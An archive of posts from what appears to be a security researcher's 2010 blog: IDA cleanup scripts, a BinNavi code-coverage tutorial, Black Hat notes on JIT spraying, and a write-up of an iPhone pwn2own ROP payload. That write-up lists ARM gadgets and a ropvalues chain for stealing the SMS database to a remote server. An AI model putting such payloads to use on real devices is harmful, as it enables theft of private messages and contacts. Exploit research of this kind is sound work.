Author Archive

Objective-C phun on Mac OS X

2010-06-08

A few posts ago Jose showed a script to clean-up ARM iPhone binaries.The x86 counterparts suffer from the same problems, so I thought it would have been useful to have something similar for it.Both the behaviour and the algorithm behind the script are pretty much the same as the one Jose wrote.
The real difference is in the “dumbish” dataflow tracing method we use. In fact the calling convention on Iphone and OS X is different; so instead of tracing register assignments we have to trace stack variables and of course we are on x86. We currently don’t track function arguments and complex operands. Of course, it can be improved, but it still yields good results as it is:)

Another problem you sometimes encounter when analyzing OSX binaries is that sections are not interpreted correctly. For this purpose I wrote a very simple script that cleans up an OSX binary IDB.Basically it will aggressively make functions in the __text segment and make sure that __cstring is effectively interpreted as a segment containing strings and not code.
You can find both scripts on our company github repository.

If you want to learn a bit more about OS X hacking and reversing consider taking the
class
I and Dino Dai Zovi are going to teach at Black Hat USA.

ROP and iPhone

2010-04-16

As you might know I and Ralf-Philipp Weinmann from University of Luxembourg won pwn2own owning the iPhone.

Smartphones are different beasts compared to desktops when it comes to exploitation. Specifically the iPhone has a fairly important exploitation remediation measure, code signing, which makes both exploitation and debugging quite annoying and definitely raises the bar when it comes to writing payloads.

What smartphones usually miss, and that is the case for iPhone as well, is ASLR. Add up the two and we have the perfect OS on which to use ROP payloads.

We are not authorized to talk about the exploit itself as it is being sold to ZDI, nonetheless we want to give a brief explanation on the payload because to the best of our knowledge it is the first practical example of a weaponized payload on ARMv7 and iPhone 3GS.

In order to decide what kind of payloads we want to write, another security countermeasure has to be taken into account, namely Sandboxing.

On iPhone most applications are sandboxed with different levels of restrictions. The sandboxing is done in a kernel extension using the MAC framework. A few well-known syscalls are usually denied(execve() to name one) and normally access to important files is restricted. One last important thing to notice is that the iPhone doesn’t have a shell, so that is not an option for our payload.

Luckily we are able to read files like the SMS database, the address book database and a few others containing sensitive information (this depends on the specific sandbox profile of the application).

A few notions are needed to be able to write ARM payloads, a lot of good information on the topic can be found here. I will nonetheless outline the basics needed below.

The first thing one has to understand before writing a ROP payload is the calling convention used in iPhoneOS.

For iPhone the first four arguments are passed using r0-r3 registers. If other arguments are needed those are pushed onto the stack. Functions usually return to the address pointed by the LR register so when we write our payload we need to make sure that we control LR.

Another important difference between ARM ROP payloads and x86 ROP payloads are instruction sizes.

In ARM there are only two possible sizes for instructions: 4 bytes or 2 bytes. The second type is called THUMB mode. To access THUMB instructions one has to set the program counter to addresses that are not 4-bytes aligned, this will cause the processor to switch to THUMB mode. More formally the processor will switch to THUMB mode when the T bit in the CPSR is 1 and the J bit is 0.

Starting from ARMv7 a “hybrid” mode was introduced, THUMB2. This mode supports both 32bits and 16bits instructions (the switch between 32 bits and 16 bits is done following the same criteria explained before for THUMB).

One last thing has to be noticed is that usually functions are called through b/bl/blx instructions, when writing our payload we are almost always forced not to use bl and blx. In fact those two instructions will save the next instructions into the lr register, thus we lose control over the program flow.

I won’t describe in details the concepts behind ROP as there is plenty of literature available. Tim is writing about ROP on ARM in our blog as well.

I will instead try to outline what important steps are needed when it comes to writing an ARM ROP payload on the iPhone.

In our exploit we know that some data we control lies in r0. The first thing we want to achieve is to control the stack pointer. So we have to find a sequence that allows us to switch the stack pointer with a memory region we control. We do this in two stages:

6a07 ldr r7, [r0, #32]
f8d0d028 ldr.w sp, [r0, #40]
6a40 ldr r0, [r0, #36]
4700 bx r0

// r0 is a pointer to the crafted data structure used in the exploit. We point r7 to our crafted stack, and r0 to the address of the next rop gadget.
// The stack pointer points to something we don't control as the node is 40 bytes long. So we just to another code snippet which will put us in control of SP.

f1a70d00 sub.w sp, r7, #0 ;0x0
bd80 pop {r7, pc}

Now that we control the stack pointer we can take a closer look at our payload.

A file stealer payload should in principle do the following:

  1. Open a file
  2. Open a socket
  3. Connect to the socket
  4. Get the file size (using for instance fstat())
  5. Read the content of the file (in our case by mmaping it into memory)
  6. Write the content of the file to the remote server
  7. Close the connection
  8. Exit the process/continue execution

This is quite a long list for a ROP shellcode therefore we are not going to discuss each and every step, but just highlight some that are very important.

The first thing our payload needs to do is to control the content of lr register, a gadget that allows us to do so is:

e8bd4080 pop {r7, lr}
b001 add sp, #4
4770 bx lr

Next we will see an example of how a function can be called using ROP on ARM. We take as an example mmap() because it has more than 4 arguments therefore it is a bit trickier:

ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
ropvalues[i++] = 0x00000000; //r5 whatever
ropvalues[i++] = 0x000000000; //r8 is gonna be the file len for mmap
ropvalues[i++] = 0x000000002; //r9 MAP_PRIVATE copied in r3
ropvalues[i++] = 0x32988d5f; // PC
//32988d5e bd0f pop {r0, r1, r2, r3, pc}

ropvalues[i++] = locFD - 36; // r0 contains the memory location where the FD is stored
ropvalues[i++] = locStat +60;	// r1 struct stat file size member
ropvalues[i++] = 0x00000001; // r2 PROT_READ
ropvalues[i++] = 0x00000000; // r3 is later used to store the FD in the following gadget
ropvalues[i++] = 0x32979837;
//32979836 6a43 ldr r3, [r0, #36]
//32979838 6a00 ldr r0, [r0, #32]
//3297983a 4418 add r0, r3
//3297983c bd80 pop {r7, pc}
ropvalues[i++] = sp + 73*4 + 0x10;
ropvalues[i++] = 0x32988673;
//32988672	 bd01	pop	{r0, pc}
ropvalues[i++] = sp -28; //r0 has to be a valid piece of memory we don't care about(we just care for r1 here)
ropvalues[i++] = 0x329253eb;
//329253ea 6809 ldr r1, [r1, #0]
//329253ec 61c1 str r1, [r0, #28]
//329253ee 2000 movs r0, #0 //this will reset to 0 r0 (corresponding to the first argument of mmap())
//329253f0 bd80 pop {r7, pc}
ropvalues[i++] = sp + 75*4 + 0xc; //we do this because later SP will depend on it
ropvalues[i++] = 0x328C5CBd;
//328C5CBC STR R3, [SP,#0x24+var_24]
//328C5CBE MOV R3, R9 //r9 was filled before with MAP_PRIVATE flag for mmmap()
//328C5CC0 STR R4, [SP,#0x24+var_20]
//328C5CC2 STR R5, [SP,#0x24+var_1C]
//328C5CC4 BLX ___mmap
//328C5CC8 loc_328C5CC8 ; CODE XREF: _mmap+50
//328C5CC8 SUB.W SP, R7, #0x10
//328C5CCC LDR.W R8, [SP+0x24+var_24],#4
//328C5CD0 POP {R4-R7,PC}

ropvalues[i++] = 0xbbccddee;//we don't care for r4-r7 registers
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x32987baf;
//32987bae bd02 pop {r1, pc}

This payload snippet roughly traslates to:

mmap(0x0, statstruct.st_size, PROT_READ, MAP_PRIVATE, smsdbFD, 0x0);

What we had to do here is to store the arguments both inside the registers (the easy part) and to push two of them onto the stack.

Pushing arguments on the stack creates an extra problem when writing a ROP payload because we have to make sure our payload is aligned with the stack pointer, this is why we to craft r7 in a specific way in line 26.

Finally we pop the program counter and jump to some other instructions in memory.

Having seen this payload one may wonder how to find the proper gadgets in the address space of a process.

As said before iPhone doesn’t have ASLR enforced which means that every library mapped in the address space is a possible source of gadgets.

There are some automated tools to find those gadgets and compile them to form a ROP shellcode on x86. Unfortunately that is not the case for ARM. Our co-worker Tim maintains and develops a great tool written for his thesis that can ease the process of finding gadget on ARM and he is currently working on extending the tool to compile (or better combine) gadgets to form valid shellcode.

As far as we know no techniques to disable code signing “on the fly” have been found on the latest firmware of iPhone.

It is therefore important for anyone trying to exploiting an iPhone vulnerability to learn ROP programming.

One last thing has to be said: the iPhone security model is pretty robust as it is now.

If it would ever support ASLR attacking it will be significantly harder than any desktop OS. In fact, most applications are sandboxed which greatly limits their abilities of doing harm and code signing is always in place. ASLR will limit the ability of creating ROP payloads and there are neither Flash nor a JIT compiler to play with on the iPhone;)

Finally if you are interested in iPhone hacking you should attend the class that I am going to give together with Dino Dai Zovi at Black Hat USA. It will be on Mac OS X hacking but most of the teaching material can be used on iPhone as well!

Cheers,
Vincenzo

Black Hat DC “report”

2010-02-10

As some of you might know I did a talk at BH DC this year about fuzzing, below the slides and the white paper. I strongly suggest you to take a look at the white paper first as the slides are full of pictures therefore not really useful from a learning point of view. If you have any questions/suggestions on the content, please feel free to write me an email or comment on this blog post.

I am not a big fan of conference reports and stuff like that but I feel like spending a few words on the attack shown by Dionysus Blazakis as I found it pretty relevant for real world exploitation scenarios. I do not want to explain again what he did – both the white paper and the slides are public- but the important facts are mainly two:

  1. Defeating DEP by using JITSpraying
  2. Defeating ASLR by exploiting a weakness in how hash maps are ordered

In Flash it is possible to combine the two by JITspraying a piece of memory, insert the function object (with the shellcode) in a dictionary/set that uses hash maps for storing data and by using (2) being able to find the address of the shellcode.

The reason why this technique is so cool is because JITSpraying does not work just on Flash, but on everything that has a JIT compiler which creates predictable output inside it,  and it is not trivially fixable. As for the technique for defeating ASLR it is easier to fix(well, sort of) but still it is one of  the most advanced attacks against it we have seen so far.

The bottom line: the sky isn’t falling, but if you are an exploit writer you really want to learn this technique. If you are not you should learn it anyway – I expect to see quite a lot of exploits using this technique.

Black Hat DC preview

2010-01-27

On February 3rd I will be speaking at Black Hat DC. The talk is about fuzzing. Today Microsoft has its SDL, Abobe has apparently started fuzzing its own products and other companies are doing the same as well. The bottom line is that fuzzing is getting harder for us. In the talk I will explain how to create a new type of fuzzer by combining static analysis metrics and dynamic analysis techniques. This new approach will ease the process of fuzzing by totally removing the data-modeling part that is usually necessary with generation-based fuzzers. At the same time it will have better results than mutation-based fuzzers. I have written about some of the techniques/metrics used in the fuzzer in my previous blog posts. So to have a taste of the talk here are a few links: cyclomatic complexityloop detection and code coverage.

Anyway if you happen to be in DC during Black Hat or in NYC a few days after (4 -7 February) and you want to talk with me about:

  1. Reverse engineering and the like : you have a problem that’s driving you crazy, you can solve one of those problems for me or you want to show me something very cool you are working on.
  2. Our products: you want more info, you know how to improve them, you want  to congratulate me because they are *so* cool
  3. You feel generous and want to offer me a beer
  4. You want to insult me because this blog post is *very* annoying

Send me an email!

After the conference I will do a follow-up post with slides, white paper, code and what you have missed at the conference.

Cheers,

Vincenzo

Code coverage and BinNavi

2010-01-24

I have already explained in my previous posts how much I love static analysis, nonetheless sometimes you have to get your hands dirty and use a debugger. In this post we will take a look at the BinNavi debugging APIs and how to use them to create a code coverage plugin. In this blog post I have spoken about how to use BinNavi “without BinNavi” so in order to fully understand the rest of the post it is probably better to take a look at it.

We implement code coverage at basic blocks level, that is we set a breakpoint at the beginning of each basic block inside a module. So the first thing to do is to retrieve the basic blocks of a given module. BinNavi exports a method to directly read the start address of each basic block belonging to a given module from the database instead of iterating through the functions and retrieve the basic blocks structures. It should be noticed though that this method cannot be used to modify basic blocks structures.

for module in mods:
    addresses = ModuleHelpers.getBasicBlockAddresses(module)
    for address in addresses:
        addr = address.toLong()
        # filter them using user-supplied lower and upper bound addresses
        if start_addr <= addr <= end_addr:
            blocks.append(addr)

print "Total basic blocks", len(blocks)

Of course those addresses need to be relocated at run-time,  therefore the next task is to locate the module in-memory and relocate each address accordingly. Intuitively in order to do so we need to attach to the remote process and look for loaded modules until we find the one we are interested in:

def getRunningModule(self, moduleName):

    if self.debugger is None:
        return None

    self.debugger.process.addListener(self)
    self.name = moduleName

    if self.debugger.isConnected() is False:
        print "attaching to the remote target"
        self.debugger.connect()

    while self.module is None:
        continue

    self.debugger.suspend()

We suspend the target process here because before executing the process we first need to relocate the addresses and set breakpoints. We will resume it after both operations are completed.

As you might have noticed before attaching to the remote target we register a listener for the target process.
There are a few types of listener classes useful for our purposes, most notably IDebuggerListener and IProcessListener. Both of them are notified when common debugging events happen. To learn more about those listeners  I suggest you to take a look at the documentation.
In our class we implement a few methods of the IProcessListener class which are called by the dispatcher inside BinNavi when certain messages are delivered from the remote debugger.

def changedTargetInformation(self, process):
    self.debugger.resume()

def addedModule(self, process, mod):
    if self.module != None:
        return
    for module in process.modules:
        if module.name.find(self.name) != -1:
            self.module = module

The first method is called when the debugger attaches to the target process and retrieves some basic information on it. We need to resume the process at that point as the debugger after the initialization suspends it(notice that the call to suspend() in the previous code snippet happens after we locate the module in memory, that is after we call resume() here).

The second method is called whenever a new image is loaded in the process address space. In our code as soon as we find the module we are looking for we don’t care about other images.

Now that we have the module in-memory we can relocate the addresses:

inMemoryAddr = runningModule.baseAddress.toLong()
originBaseAddr = self.naviDB.module.imagebase.toLong()
print "Original Base Address: %x In-Memory one: %x\n Relocating..\n" % (inMemoryAddr, originBaseAddr)
for bb in self.blocks:
    addresses.append((bb - originBaseAddr) + inMemoryAddr)

I lied when I said we need to set breakpoints, in fact BinNavi takes care of that internally by the means of a TraceLogger!

for address in addresses:
    naviAddresses.append(TracePoint(self.traceEntity, Address(address)))

print "Starting the process...\n"
tracer = TraceLogger(self.debugger, self.traceEntity)
self.traceManager = myTraceListener(addresses)
self.trace = tracer.start("codeCoverage", "", naviAddresses)
self.trace.addListener(self.traceManager)
self.debugger.resume()

TraceLogger is a class which let create a log of echo breakpoint events, that is we create a list of TracePoints (locations where the trace logger sets echo breakpoints) and the TraceLogger will take care of the rest.

Echo breakpoints are a ‘lightweight’ version of regular breakpoints. In essence, echo breakpoints get removed after they are initially hit. This leads to better performance of the application that is being debugged, as execution speed of a particular path is only slowed down during the -first- execution.

So first we set up the tracer and then we create the trace. A trace can have a listener which is notified when a new event is added; we use such a listener to keep track of the blocks touched during the execution.

class myTraceListener(ITraceListener):
    def __init__(self, addresses):
        self.addyCount = []
        for address in addresses:
            self.addyCount.append((address, 0))

    def addedEvent(self, trace, event):
        for addy, counter in self.addyCount:
            if addy == event.address:
                self.addyCount.remove((addy, counter))
                self.addyCount.append((addy, counter + 1))

When a new event is added, we retrieve the address and update the address counter accordingly.
At this point we are all set, and we can get the code coverage score:

    def getCodeCoverage(self):
       #get the list of all the executed blocks at a given program point
        touched_blocks = self.naviTracer.getExecBlocks()
        coverage = float(len(touched_blocks)) / float(len(self.getBlocks()))
        return coverage

    def printStatistics(self):
        print "CODE COVERAGE = %f\n" % self.getCodeCoverage()

Let’s run it then! On the target machine we run:

client32.exe C:\WINDOWS\system32\calc.exe

on the local machine

jython NaviCoverage.py databaseHost databaseUser databasePassword databaseName calc.exe

And here’s a screenshot

That’s all for now.